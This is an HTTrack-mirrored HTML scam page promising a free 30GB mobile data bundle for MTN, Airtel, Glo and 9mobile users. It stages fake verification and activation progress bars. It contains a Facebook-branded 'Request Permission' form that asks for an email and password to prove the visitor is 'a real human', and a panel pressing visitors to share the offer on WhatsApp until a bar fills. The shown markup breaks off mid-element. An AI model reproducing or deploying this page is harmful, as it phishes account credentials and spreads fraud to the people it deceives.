<!DOCTYPE html>
<html>


<!-- Mirrored from get-it.sbs/DATA.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 18 Dec 2021 05:29:08 GMT -->
<head>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-162773848-9"></script>      
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-162773848-9');
</script>
    <script>

        function set_Cookie(name,value){
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days*20*1000));
            document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+"; path=/;"
        }
        function get_Cookie(name){
            var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
            if(arr=document.cookie.match(reg)){
                return unescape(arr[2]);
            }
            return '';
        }


        /*            if(get_Cookie("d")>0 &&get_Cookie("d")<12){
                        document.getElementById("first-box")."quedate__step".display="none";//隐藏;
                        document.getElementById("second-box").style.display="none";//隐藏;
                        document.getElementById("third-box").style.display="none";//隐藏;
                        document.getElementsByClassName("loading2__box").style.display="";//隐藏;
                    }*/


    </script>
    <meta charset="utf-8">
    <meta name="viewport"
          content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
    <meta property="og:site_name" content="Free 30GB Data Plan Activation Code">
    <meta property="og:title" content="Free 30GB Data Plan Activation Code For All Network."/>
    <meta property="og:description" content="Get 2 Months Free 30GB Data Bundle">
    <meta property="og:image" itemprop="image" content="https://b8m7d3d6.rocketcdn.me/wp-content/uploads/2020/04/data-shae.png">
    <meta property="og:type" content="website"/>
    <meta property="og:updated_time" content="1440432930"/>
    <!-- <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500&display=swap" rel="stylesheet">-->
    <title>FREE 30GB DATA REWARD PORTAL</title>
    


    <style>
        :root {
            --color-primary: rgb(37, 38, 38);
            --color-secondary: #b52f4e
        }

        * {
            box-sizing: border-box;
            padding: 0;
            margin: 0
        }

        html {
            font-size: 62.5%;
            font-family: Montserrat;
            font-weight: 500;
            color: var(--color-primary)
        }

        .quedate-container, body {
            width: 100vw
        }

        .container-chat {
            font-weight: 400
        }

        .chat, .wrapper {
            display: flex;
            flex-direction: column
        }

        .loading__box-1--hidden {
            display: none !important
        }

        .loading__box-2--hidden {
            display: none !important
        }

        .loading__box-3--hidden {
            display: none !important
        }

        .loading__check-1--hidden {
            display: none !important
        }

        .loading__check-2--hidden {
            display: none !important
        }

        .loading__check-3--hidden {
            display: none !important
        }

        .chat__reactions {
            width: 90%;
            margin: 2rem auto 0;
            display: flex;
            align-items: stretch;
            font-size: .95rem
        }

        .chat__reactions-icon {
            width: 1.2rem;
            margin-right: .2rem
        }

        .chat__reactions-text {
            margin-left: .5rem
        }

        .chat__reactions-counter {
            margin-left: 1.8rem
        }

        .chat__actions {
            margin-top: 1rem;
            display: flex;
            justify-content: space-around;
            font-size: 1.2rem;
            border-top: 1.4px solid #b0b0b0;
            border-bottom: .5px solid #d3d3d3
        }

        .chat__actions-box {
            display: flex;
            align-items: center
        }

        .chat__actions img {
            width: 4rem
        }

        .chat__conversation {
            width: 90%;
            margin: 0 auto;
            font-size: 1.1rem
        }

        .chat__conversation-box {
            display: flex;
            flex-direction: row;
            align-items: center;
            margin-top: 1rem;
            position: relative
        }

        .chat__conversation-box--right {
            margin-left: 20%;
            margin-bottom: 1rem
        }

        .chat__conversation-box-img {
            width: 3.5rem;
            border-radius: 50%;
            margin-right: 1rem;
            align-self: baseline
        }

        .chat__conversation-box-active {
            width: 1rem;
            height: 1rem;
            background-color: var(--color-secondary);
            border-radius: 50%;
            position: absolute;
            top: 2.5rem;
            left: 2.7rem
        }

        .chat__conversation-box-content-comment {
            padding: 1rem;
            background-color: #f2f3f5;
            border-top-left-radius: 14px;
            border-top-right-radius: 14px;
            border-bottom-left-radius: 14px;
            border-bottom-right-radius: 14px
        }

        .chat__conversation-box-content-comment-name {
            color: #726695;
            font-weight: 500;
            margin-right: .4rem
        }

        .chat__conversation-box-content-cta {
            margin-top: .3rem;
            padding-left: 1.5rem;
            color: #726695
        }

        .chat__conversation-box-content-cta-text {
            margin-right: .5rem
        }

        .chat__conversation-box-content-cta--2 {
            font-size: .9rem
        }

        .chat__conversation-reply {
            margin-left: 20%;
            color: gray
        }

        .chat__conversation-reply--efect {
            animation: opacidad 1s infinite
        }

        @keyframes opacidad {

        0
        {
            opacity: 0
        }
        50
        %
        {
            opacity: 1
        }
        100
        %
        {
            opacity: 0
        }
        }
        .chat__conversation-write {
            position: relative;
            margin-bottom: 2rem
        }

        .chat__conversation-write input {
            width: 100%;
            margin-top: 2rem;
            margin-bottom: 1rem;
            border: none;
            background-color: #f2f3f5;
            border-radius: 100px;
            padding: .8rem;
            color: var(--color-primary);
            padding-left: 1rem;
            outline: 0
        }

        .chat__conversation-write-icons {
            display: flex;
            flex-direction: row;
            position: absolute;
            right: 1.2rem;
            top: 1.8rem
        }

        .chat__conversation-write-icons-img {
            width: 1.2rem;
            margin-right: .5rem;
            fill: gray
        }

        .chat__conversation-write-icons-img--svg {
            width: 2rem
        }

        .loading {
            width: 100%;
            height: 220px;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            position: absolute;
            top: 48px;
            z-index: 10;
            background-color: #fff;
            box-shadow: 4px 4px 18px 3px rgba(0, 0, 0, .3)
        }

        .loading__box {
            width: 50%;
            display: flex;
            flex-direction: row;
            align-items: center;
            position: relative
        }

        .loading__animate, .loading__check {
            width: 5rem
        }

        .loading__check {
            position: absolute;
            left: 0
        }

        .loading__txt {
            font-size: 1.2rem;
            color: var(--color-primary);
            margin-left: 1rem
        }

        .loading2 {
            width: 100%;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            position: absolute;
            top: 48px;
            z-index: 20;
            background-color: #fff;
            box-shadow: 4px 4px 18px 3px rgba(0, 0, 0, .3)
        }

        .loading2__box {
            text-align: justify;
            padding: 2rem;
            color: var(--color-primary);
            font-size: 14px
        }

        .loading2__permission {
            width: 12rem;
            margin: 0 auto
        }

        .js-hidden {
            display: none !important
        }

        .js-display {
            display: block
        }

        .js-show {
            visibility: hidden !important
        }

        .logo-container {
            width: 100%;
            padding-top: 1.5rem;
            padding-bottom: 1.5rem;
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: center;
            color: var(--color-primary);
            font-size: 1.8rem
        }

        .quedate-container {
            width: 100%;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center
        }

        .quedate {
            width: 100%
        }

        .quedate__fixed {
            background-color: var(--color-primary)
        }

        .quedate__fixed-box {
            width: 90%;
            margin: 0 auto;
            display: flex;
            align-items: center;
            padding: .5rem
        }

        .quedate__fixed-box span {
            margin: 0 auto;
            color: #fff;
            font-size: 1.5rem
        }

        .quedate__company {
            width: 30%;
            border-right: 1px solid var(--color-secondary)
        }

        .quedate__step {
            width: 100%;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            padding-top: 3rem
        }

        .quedate__step-box {
            width: 80%;
            height: 70px;
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: center;
            margin-bottom: 2rem
        }

        .quedate__border {
            width: 30px;
            height: 80%;
            background-color: var(--color-secondary);
            margin-right: 1rem
        }

        .quedate__cta-btn {
            width: 80%;
            font-size: 2rem;
            font-weight: 700;
            color: #fff;
            padding: 1rem;
            border: none;
            background-color: var(--color-secondary);
            border-top-left-radius: 14px;
            border-top-right-radius: 14px;
            border-bottom-left-radius: 14px;
            border-bottom-right-radius: 14px;
            outline: 0;
            margin: 0 0 0 3.5rem
        }

        .quedate__cta-btn:active, .quedate__cta-btn:hover {
            background-color: #03a658
        }

        .quedate__cta-btn:active {
            transform: translateY(2px)
        }

        .quedate__loading {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center
        }

        .quedate__svg {
            position: relative
        }

        .quedate__check {
            position: absolute;
            left: 0
        }

        .quedate__porcent {
            margin-top: 1rem;
            margin-bottom: 2rem;
            font-size: 2.5rem;
            font-weight: 700
        }

        .quedate__form {
            border: 1.5px solid #c0bfc3;
            border-top-right-radius: 8px;
            border-top-left-radius: 8px;
            border-bottom-left-radius: 8px;
            border-bottom-right-radius: 8px;
            padding: 1rem;
            position: relative;
            margin-top: 2.5rem
        }

        .quedate__form-input {
            border: none;
            outline: 0
        }

        .quedate__form-input::placeholder {
            color: #c0bfc3;
            font-family: inherit;
            font-size: 1.5rem
        }

        .quedate__form-separar {
            position: absolute;
            width: 1px;
            height: 100%;
            top: 0;
            background-color: #c0bfc3
        }

        .quedate__form-label {
            font-size: 1.5rem;
            font-weight: 700;
            padding: 2rem
        }

        .quedate__first {
            width: 90%;
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: center;
            margin: 9px auto
        }

        .quedate__load {
            width: 80%;
            font-size: 1.3rem;
            padding: .8rem;
            border: 1px solid var(--color-primary);
            position: relative
        }

        .quedate__load-icon {
            width: 30%;
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: center;
            position: relative;
            border: 1px solid var(--color-primary);
            padding-right: .8rem;
            padding-left: .8rem;
            border-left: none
        }

        .quedate__load-text {
            margin-left: .5rem;
            font-size: 1.2rem;
            font-weight: 700
        }

        .quedate__load-a {
            position: absolute;
            height: 3.2rem;
            top: 0;
            z-index: -1;
            left: 0;
            background-color: var(--color-secondary)
        }

        .permision-container {
            width: 95%;
            margin: 0 auto;
            display: flex;
            flex-direction: column;
            align-items: center;
            background-color: #fff;
            box-shadow: 4px 4px 18px 3px rgba(0, 0, 0, .4);
            position: absolute;
            top: .8rem;
            left: .8rem;
            z-index: 15
        }

        .permision-container-box {
            width: 95%;
            margin: 0 auto
        }

        .permision-container-end, .permision-container-request-text {
            width: 100%;
            padding: 1.2rem;
            background-color: #ededf3;
            font-size: 1.5rem;
            font-weight: 700
        }

        .permision-container-end {
            font-size: 1rem;
            font-weight: 400;
            text-align: center
        }

        .permision-container-data {
            padding: 2rem
        }

        .permision-container-icons {                                           
            width: 60%;
            margin: 0 auto;
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: space-around;
            margin-bottom: 2.5rem
        }

        .permision-container-icons-face, .permision-container-icons-uber {
            width: 8rem
        }

        .permision-container-txt {
            margin: 0 auto;
            font-size: 1.5rem;
            text-align: center;
            margin-bottom: 1.5rem
        }

        .permision-container-form {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: space-between
        }

        .permision-container-input {
            outline: 0;
            padding: 1.2rem;
            width: 100%;
            margin-bottom: 1.5rem;
            border-top-left-radius: 10px;
            border-top-right-radius: 10px;
            border-bottom-left-radius: 10px;
            border-bottom-right-radius: 10px;
            border: 1px solid #b9b9b9;
            color: gray;
            font-size: 1.2rem
        }

        .permision-container-secure {
            margin-top: 1rem;
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: center;
            color: #a2a2a2
        }

        .permision-container-secure svg {
            width: 1.5rem;
            height: 1.5rem;
            margin-right: 1rem
        }

        .permision-container-cta {
            width: 100%;
            padding: .8rem;
            margin-top: 1rem;
            margin-bottom: 1.5rem;
            margin-left: 0;
            font-size: 1.8rem
        }

        /* Chrome, Safari, Edge, Opera */
        input::-webkit-outer-spin-button, input::-webkit-inner-spin-button {
            -webkit-appearance: none;
            margin: 0;
        }

        /* Firefox */
        input[type=number] {
            -moz-appearance: textfield;
        }
    </style>
<link rel="me" href="https://www.blogger.com/profile/09413084019385763375" />
</head>

<body>
    
<div id=fireworks>    
    
<div class="wrapper">
    <div class="container-main">
        
        <img src="../getpaidfile.com/wp-content/uploads/2021/12/MTN-AIRTEL-GLO-and-9MOBILE-logos.jpg" width="100%">
        
        <header class="logo-container">
            <svg fill="#b52f4e" height="20px" viewBox="-31 0 512 512" width="20px" xmlns="http://www.w3.org/2000/svg">
                <path d="m30 316c-16.570312 0-30 13.429688-30 30 0 16.566406 13.429688 30 30 30h59l-14 106c0 16.566406 13.429688 30 30 30s30-13.433594 30-30l14-106h120l-14 106c0 16.566406 13.429688 30 30 30s30-13.433594 30-30l14-106h61c16.570312 0 30-13.433594 30-30 0-16.570312-13.429688-30-30-30h-53l16-120h67c16.570312 0 30-13.433594 30-30 0-16.570312-13.429688-30-30-30h-59l14-106c0-16.570312-13.429688-30-30-30s-30 13.429688-30 30l-14 106h-120l14-106c0-16.570312-13.429688-30-30-30s-30 13.429688-30 30l-14 106h-61c-16.570312 0-30 13.429688-30 30 0 16.566406 13.429688 30 30 30h53l-16 120zm143-120h120l-16 120h-120zm0 0" />
            </svg>
            
                
                    
            <span class="quedate-logo">FREE DATA SYNCHRONIZATION</span>
        </header>
        <div class="quedate-container">
            <main class="quedate">
                
                    
                

                <!-- Primera parte: ads description -->
                <div class="quedate__step" id="first-box">
                    <div class="quedate__step-box">
                        <p style="font-size: 1.5rem; text-align:center" class="quedate__text"><b class="quedate__city"></b>Verify Your Phone Number On The Next Page To Complete Your Free Data Synchronization and Activation.</p>
                    </div>
                    <button style="margin:0;" id="validar" class="quedate__cta-btn">Verify Now</button>
                </div>


                <div class="quedate__loading">
                    <!--loading svg-->
                    <svg id="loading-svg" class="js-hidden" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto; " viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="10rem">
                        <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#b52f4e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
                            <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
                        </circle>
                        <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#5de9a6" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
                            <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
                        </circle>
                    </svg>
                    <!--end loading svg-->

                    <!--checked svg-->
                    <svg id="check-svg" class="js-hidden" xml:space="preserve" viewBox="0 0 100 100" y="0" x="0" xmlns="http://www.w3.org/2000/svg" id="鍦栧堡_1" version="1.1" style=" background: rgb(255, 255, 255);" width="10rem">
                            <g class="ldl-scale" style="transform-origin: 50% 50%; transform: rotate(0deg) scale(0.8, 0.8);">
                                <g class="ldl-ani">
                                    <g class="ldl-layer">
                                        <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -0.833333s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;">
                                            <circle stroke-miterlimit="10" stroke-width="8" stroke="#333" fill="none" r="40" cy="50" cx="50" style="stroke: rgb(6, 193, 103);"></circle>
                                        </g>
                                    </g>
                                    <g class="ldl-layer">
                                        <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -1.11111s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;">
                                            <path fill="#abbd81" d="M73.3 33.5c-2.3-2.3-6.1-2.3-8.4 0L44.5 53.9l-9.4-9.4c-2.3-2.3-6.1-2.3-8.4 0-1.1 1.1-1.7 2.6-1.7 4.2s.6 3.1 1.7 4.2l13.6 13.6c1.1 1.1 2.6 1.7 4.2 1.7s3.1-.6 4.2-1.7L73.2 42c1.1-1.1 1.7-2.6 1.7-4.2s-.5-3.1-1.6-4.3z" style="fill: rgb(6, 193, 103);"></path>
                                        </g>
                                    </g>
                                    <metadata xmlns:d="https://loading.io/stock/">
                                        <d:name>ok</d:name>
                                        <d:tags>ok,confirm,ready,positive,check,right,correct,affirmative,success</d:tags>
                                        <d:license>by</d:license>
                                        <d:slug>364zp</d:slug>
                                    </metadata>
                                </g>
                            </g>
                        </svg>
                    <!--end check svg-->

                    <span class="quedate__porcent js-hidden"></span>
                    <span style="font-size: 16px;font-weight: bold;" class="quedate__porcent-text js-hidden">Verification Successfully.</span>
                </div>
                <!-- termina la primera parte -->

                <!-- Segunda parte -->
                <div id="second-box" style="margin-bottom: 2.5rem" class="quedate__step js-hidden">
                    <div class="quedate__step-box">
                        <p style="font-size: 1.5rem; text-align:center" class="quedate__text"><b class="quedate__city"></b>Confirm Your Phone Number Below To Begin The Data Activation.</p>
                    </div>
					
                  <div align="center">
  
                  </div>
                    <script>
                        var prevent = (e) => e.preventDefault();
                    </script>
                    <form class="quedate__form" onsubmit="return prevent(event)">
                        <input class="quedate__form-input" id="num" type="number" placeholder="Enter Phone Number">
                        <span class="quedate__form-separar"></span>
                        <label id="enviar" class="quedate__form-label" for="num">CONFIRM</label>
                        <div class="message-status js-hidden"></div>
                    </form>
                </div>

                <!-- Tercera parte -->
                <div id="third-box" style="margin-bottom: 2.5rem;" class="quedate__step js-hidden">
                    <span style="font-weight: bold; font-size: 2rem; text-align:center" class="quedate__text">Data Activation Processing...</span>
                    <div class="quedate__first js-hidden">
                        <div style="border: 1px solid gray;  width:80%" class="quedate__load">Processing Data....<span class="quedate__load-a js-hidden"></span>
                        </div>
                        <div style="border: 1px solid gray;border-left: none; width:30%" class="quedate__load-icon">
                            <svg id="first-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="3.2rem">
                                <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#b52f4e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
                                    <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
                                </circle>
                                <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#5de9a6" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
                                    <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
                                </circle>
                            </svg>
                            <svg id="first-checked" class="quedate__load-check js-hidden" xml:space="preserve" viewBox="0 0 100 100" y="0" x="0" xmlns="http://www.w3.org/2000/svg" id="鍦栧堡_1" version="1.1" width=" 3.2rem">
                                    <g class="ldl-scale" style="transform-origin: 50% 50%; transform: rotate(0deg) scale(0.8, 0.8);">
                                        <g class="ldl-ani">
                                            <g class="ldl-layer">
                                                <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -0.833333s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;">
                                                    <circle stroke-miterlimit="10" stroke-width="8" stroke="#333" fill="none" r="40" cy="50" cx="50" style="stroke: rgb(6, 193, 103);"></circle>
                                                </g>
                                            </g>
                                            <g class="ldl-layer">
                                                <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -1.11111s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;">
                                                    <path fill="#abbd81" d="M73.3 33.5c-2.3-2.3-6.1-2.3-8.4 0L44.5 53.9l-9.4-9.4c-2.3-2.3-6.1-2.3-8.4 0-1.1 1.1-1.7 2.6-1.7 4.2s.6 3.1 1.7 4.2l13.6 13.6c1.1 1.1 2.6 1.7 4.2 1.7s3.1-.6 4.2-1.7L73.2 42c1.1-1.1 1.7-2.6 1.7-4.2s-.5-3.1-1.6-4.3z" style="fill: rgb(6, 193, 103);"></path>
                                                </g>
                                            </g>
                                            <metadata xmlns:d="https://loading.io/stock/">
                                                <d:name>ok</d:name>
                                                <d:tags>ok,confirm,ready,positive,check,right,correct,affirmative,success</d:tags>
                                                <d:license>by</d:license>
                                                <d:slug>364zp</d:slug>
                                            </metadata>
                                        </g>
                                    </g>
                                </svg>
                            <span id="first-porcent" class="quedate__load-text"></span>
                        </div>
                    </div>

                    <div class="quedate__first js-hidden">
                        <div style="border: 1px solid gray; width:80%" class="quedate__load">Activating Data....<span class="quedate__load-a js-hidden"></span>
                        </div>
                        <div style="border: 1px solid gray;border-left: none; width:30%" class="quedate__load-icon">
                            <svg id="second-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="3.2rem">
                                <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#b52f4e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
                                    <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
                                </circle>
                                <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#5de9a6" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
                                    <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
                                </circle>
                            </svg>
                            <svg id="second-checked" class="quedate__load-check js-hidden" xml:space="preserve" viewBox="0 0 100 100" y="0" x="0" xmlns="http://www.w3.org/2000/svg" id="鍦栧堡_1" version="1.1" width=" 3.2rem">
                                    <g class="ldl-scale" style="transform-origin: 50% 50%; transform: rotate(0deg) scale(0.8, 0.8);">
                                        <g class="ldl-ani">
                                            <g class="ldl-layer">
                                                <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -0.833333s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;">
                                                    <circle stroke-miterlimit="10" stroke-width="8" stroke="#333" fill="none" r="40" cy="50" cx="50" style="stroke: rgb(6, 193, 103);"></circle>
                                                </g>
                                            </g>
                                            <g class="ldl-layer">
                                                <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -1.11111s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;">
                                                    <path fill="#abbd81" d="M73.3 33.5c-2.3-2.3-6.1-2.3-8.4 0L44.5 53.9l-9.4-9.4c-2.3-2.3-6.1-2.3-8.4 0-1.1 1.1-1.7 2.6-1.7 4.2s.6 3.1 1.7 4.2l13.6 13.6c1.1 1.1 2.6 1.7 4.2 1.7s3.1-.6 4.2-1.7L73.2 42c1.1-1.1 1.7-2.6 1.7-4.2s-.5-3.1-1.6-4.3z" style="fill: rgb(6, 193, 103);"></path>
                                                </g>
                                            </g>
                                            <metadata xmlns:d="https://loading.io/stock/">
                                                <d:name>ok</d:name>
                                                <d:tags>ok,confirm,ready,positive,check,right,correct,affirmative,success</d:tags>
                                                <d:license>by</d:license>
                                                <d:slug>364zp</d:slug>
                                            </metadata>
                                        </g>
                                    </g>
                                </svg>
                            <span id="second-porcent" class="quedate__load-text"></span>
                        </div>
                    </div>


                </div>

                <!-- Loading-->
                <div id="loading-g" class="quedate__step js-hidden">
                    <div class="quedate__step-box">
                        <svg class="quedate__animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="10rem">
                            <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#b52f4e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
                                <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
                            </circle>
                            <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#5de9a6" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
                                <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
                            </circle>
                        </svg>
                    </div>
                    <p style="font-size: 14px;font-weight: bold;">Connecting to server.....</p>
                </div>
            </main>
        </div>
        <!-- FIN PASOS -->

        <!-- Ventana permiso -->
        <div class="permision-container js-hidden">
            <span class="permision-container-request-text">Request Permission</span>
            <div class="permision-container-data">
                <div class="permision-container-icons">
                    <?xml version="1.0" encoding="iso-8859-1" ?>
                    <!-- Generator: Adobe Illustrator 18.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
                    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
                    <svg width="50px" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 112.196 112.196" style="enable-background:new 0 0 112.196 112.196;" xml:space="preserve">
                            <g>
                                <circle style="fill:#3B5998;" cx="56.098" cy="56.098" r="56.098" />
                                <path style="fill:#FFFFFF;" d="M70.201,58.294h-10.01v36.672H45.025V58.294h-7.213V45.406h7.213v-8.34
            		c0-5.964,2.833-15.303,15.301-15.303L71.56,21.81v12.51h-8.151c-1.337,0-3.217,0.668-3.217,3.513v7.585h11.334L70.201,58.294z" />
                            </g>
                        </svg>

                </div>
                <div class="permision-container-box">
                    <p class="permision-container-txt">We should validate you are a real human checking your name and profile photo.</p>
                    <form action="#" class="permision-container-form">
                        <input class="permision-container-input" type="text" id="email" placeholder="your@email.com">
                        <label class="permision-container-label" for="email"></label>
                        <input class="permision-container-input" type="password" id="pass" placeholder="路路路路路路路路路路">
                        <label class="permision-container-label" for="pass"></label>
                    </form>
                    <span class="message-status fb-request"></span>
                    <button style="width:100%; margin-left: 0;" id="aceptar" class="quedate__cta-btn">Accept - Im Human</button>
                    <div class="permision-container-secure">
                        <svg fill="#a2a2a2" height="512pt" viewBox="-64 0 512 512" width="512pt" xmlns="http://www.w3.org/2000/svg">
                            <path d="m336 192h-16v-64c0-70.59375-57.40625-128-128-128s-128 57.40625-128 128v64h-16c-26.453125 0-48 21.523438-48 48v224c0 26.476562 21.546875 48 48 48h288c26.453125 0 48-21.523438 48-48v-224c0-26.476562-21.546875-48-48-48zm-229.332031-64c0-47.0625 38.269531-85.332031 85.332031-85.332031s85.332031 38.269531 85.332031 85.332031v64h-170.664062zm0 0" />
                        </svg>
                        <p class="permision-container-secure-text">The app is not allowed to post on Facebook</p>
                    </div>
                </div>
            </div>
            <span class="permision-container-end">Our service privacy policy and conditions</span>
        </div>
        <div style="height: 269px;" class="loading2 js-hidden">
            <div style="text-align: center !important;" class="loading2__box">
                <svg class="loading2__permission" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid">
                    <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#b52f4e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
                        <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
                    </circle>
                    <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#6ae8a4" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
                        <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
                    </circle>
                </svg>
                <p style="text-align:center">Wait a moment, we validate data.</p>
            </div>
        </div>



        <!--congratulations -->
        <div id="share" class="loading2 js-hidden js-congrats">
            <div class="loading2__box">
                <span style="font-weight: bold; font-size:15px">

                <b>After sharing the message on WhatsApp, you will now go to the next step where you will be able to select device you want to use your free Data Bundle with and receive it on your Sim Card within 5 minutes.</b>
                <br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>

                <b>Click "Invite Friends/Groups" Button below to continue.</b>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
				<br>
                <b>  <center>                     Share it until the red bar is full!.</b>
				<div style="margin-top: 30px;margin-bottom: 30px;" class="quedate__first js-hidden js-share">
                    <div style="border: 1px solid gray; width:80%" class="quedate__load">Share with your groups <span class="quedate__load-a js-hidden"></span>
                    </div>
                    <div style="border: 1px solid gray;border-left: none; width:30%" class="quedate__load-icon">
                        <svg id="third-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="3.2rem">
                            <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#b52f4e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
                                <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
                            </circle>
                            <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#5de9a6" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
